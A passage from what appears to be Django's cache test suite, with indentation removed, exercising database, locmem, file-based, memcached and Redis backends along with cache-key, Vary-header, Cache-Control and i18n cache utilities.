table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_cull_count_queries(self):
old_max_entries = cache._max_entries
# Force _cull to delete on first cached record.
cache._max_entries = -1
with CaptureQueriesContext(connection) as captured_queries:
try:
cache.set('force_cull', 'value', 1000)
finally:
cache._max_entries = old_max_entries
num_count_queries = sum('COUNT' in query['sql'] for query in captured_queries)
self.assertEqual(num_count_queries, 1)
def test_delete_cursor_rowcount(self):
"""
The rowcount attribute should not be checked on a closed cursor.
"""
class MockedCursorWrapper(CursorWrapper):
is_closed = False
def close(self):
self.cursor.close()
self.is_closed = True
@property
def rowcount(self):
if self.is_closed:
raise Exception('Cursor is closed.')
return self.cursor.rowcount
cache.set_many({'a': 1, 'b': 2})
with mock.patch('django.db.backends.utils.CursorWrapper', MockedCursorWrapper):
self.assertIs(cache.delete('a'), True)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
self.assertIs(cache.add('add', bad_obj), True)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
self.assertEqual(cache.incr(key), 2)
self.assertEqual(expire, cache._expire_info[_key])
self.assertEqual(cache.decr(key), 1)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.incr(key), key + 1)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached and redis backends aren't guaranteed to be available.
# To check the backends, the test settings file will need to contain at least
# one cache backend setting that points at your cache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
PyMemcacheCache_params = configured_caches.get('django.core.cache.backends.memcached.PyMemcacheCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
RedisCache_params = configured_caches.get('django.core.cache.backends.redis.RedisCache')
# The redis backend does not support cull-related options like `MAX_ENTRIES`.
redis_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def _perform_invalid_key_test(self, key, expected_warning):
"""
While other backends merely warn, memcached should raise for an invalid
key.
"""
msg = expected_warning.replace(key, cache.make_key(key))
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [[key, 'b']]),
]
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertRaises(InvalidCacheKey) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.exception), msg)
def test_invalid_with_version_key_length(self):
# make_key() adds a version to the key and exceeds the limit.
key = 'a' * 248
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
max_value_length = 2 ** 20
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Most clients (e.g. pymemcache or pylibmc) raise when the value is
# too large. This test is primarily checking that the key was
# deleted, so the return/exception behavior for the set() itself is
# not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._class, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch.object(cache._class, 'set_multi', side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
@property
def incr_decr_type_error(self):
return cache._lib.ClientError
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
def test_pylibmc_client_servers(self):
backend = self.base_params['BACKEND']
tests = [
('unix:/run/memcached/socket', '/run/memcached/socket'),
('/run/memcached/socket', '/run/memcached/socket'),
('localhost', 'localhost'),
('localhost:11211', 'localhost:11211'),
('[::1]', '[::1]'),
('[::1]:11211', '[::1]:11211'),
('127.0.0.1', '127.0.0.1'),
('127.0.0.1:11211', '127.0.0.1:11211'),
]
for location, expected in tests:
settings = {'default': {'BACKEND': backend, 'LOCATION': location}}
with self.subTest(location), self.settings(CACHES=settings):
self.assertEqual(cache.client_servers, [expected])
@unittest.skipUnless(PyMemcacheCache_params, 'PyMemcacheCache backend not configured')
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
))
class PyMemcacheCacheTests(BaseMemcachedTests, TestCase):
base_params = PyMemcacheCache_params
@property
def incr_decr_type_error(self):
return cache._lib.exceptions.MemcacheClientError
def test_pymemcache_highest_pickle_version(self):
self.assertEqual(
cache._cache.default_kwargs['serde']._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
for cache_key in settings.CACHES:
for client_key, client in caches[cache_key]._cache.clients.items():
with self.subTest(cache_key=cache_key, server=client_key):
self.assertEqual(
client.serde._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'no_delay': True},
))
def test_pymemcache_options(self):
self.assertIs(cache._cache.default_kwargs['no_delay'], True)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = self.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = self.dirname
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def mkdtemp(self):
return tempfile.mkdtemp()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
@skipIf(
sys.platform == 'win32',
'Windows only partially supports umasks and chmod.',
)
def test_cache_dir_permissions(self):
os.rmdir(self.dirname)
dir_path = Path(self.dirname) / 'nested' / 'filebasedcache'
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = dir_path
setting_changed.send(self.__class__, setting='CACHES', enter=False)
cache.set('foo', 'bar')
self.assertIs(dir_path.exists(), True)
tests = [
dir_path,
dir_path.parent,
dir_path.parent.parent,
]
for directory in tests:
with self.subTest(directory=directory):
dir_mode = directory.stat().st_mode & 0o777
self.assertEqual(dir_mode, 0o700)
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=OSError):
with self.assertRaises(OSError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
@unittest.skipUnless(RedisCache_params, "Redis backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=RedisCache_params,
exclude=redis_excluded_caches,
))
class RedisCacheTests(BaseCacheTests, TestCase):
def setUp(self):
import redis
super().setUp()
self.lib = redis
@property
def incr_decr_type_error(self):
return self.lib.ResponseError
def test_cache_client_class(self):
self.assertIs(cache._class, RedisCacheClient)
self.assertIsInstance(cache._cache, RedisCacheClient)
def test_get_backend_timeout_method(self):
positive_timeout = 10
positive_backend_timeout = cache.get_backend_timeout(positive_timeout)
self.assertEqual(positive_backend_timeout, positive_timeout)
negative_timeout = -5
negative_backend_timeout = cache.get_backend_timeout(negative_timeout)
self.assertEqual(negative_backend_timeout, 0)
none_timeout = None
none_backend_timeout = cache.get_backend_timeout(none_timeout)
self.assertIsNone(none_backend_timeout)
def test_get_connection_pool_index(self):
pool_index = cache._cache._get_connection_pool_index(write=True)
self.assertEqual(pool_index, 0)
pool_index = cache._cache._get_connection_pool_index(write=False)
if len(cache._cache._servers) == 1:
self.assertEqual(pool_index, 0)
else:
self.assertGreater(pool_index, 0)
self.assertLess(pool_index, len(cache._cache._servers))
def test_get_connection_pool(self):
pool = cache._cache._get_connection_pool(write=True)
self.assertIsInstance(pool, self.lib.ConnectionPool)
pool = cache._cache._get_connection_pool(write=False)
self.assertIsInstance(pool, self.lib.ConnectionPool)
def test_get_client(self):
self.assertIsInstance(cache._cache.get_client(), self.lib.Redis)
class FileBasedCachePathLibTests(FileBasedCacheTests):
def mkdtemp(self):
tmp_dir = super().mkdtemp()
return Path(tmp_dir)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_only_initialized(self):
with self.settings(CACHES={
'cache_1': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
'cache_2': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
}):
self.assertEqual(caches.all(initialized_only=True), [])
signals.request_finished.send(self.__class__)
self.assertEqual(caches.all(initialized_only=True), [])
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = update_cache if update_cache else True
return request
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('*', ('Accept-Language', 'Cookie'), '*'),
('Accept-Language, Cookie', ('*',), '*'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response.headers['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# no-cache.
('', {'no_cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('', {'no-cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('no-cache=Set-Cookie', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie,no-cache=Link', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie', {'no_cache': 'Link'}, {'no-cache=Set-Cookie', 'no-cache=Link'}),
(
'no-cache=Set-Cookie,no-cache=Link',
{'no_cache': 'Custom'},
{'no-cache=Set-Cookie', 'no-cache=Link', 'no-cache=Custom'},
),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response.headers['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response.headers['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
return UpdateCacheMiddleware(lambda req: HttpResponse(msg))(request)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
def get_response(req):
return HttpResponse(msg)
translation.activate(lang)
return UpdateCacheMiddleware(get_response)(request)
# cache with non empty request.GET
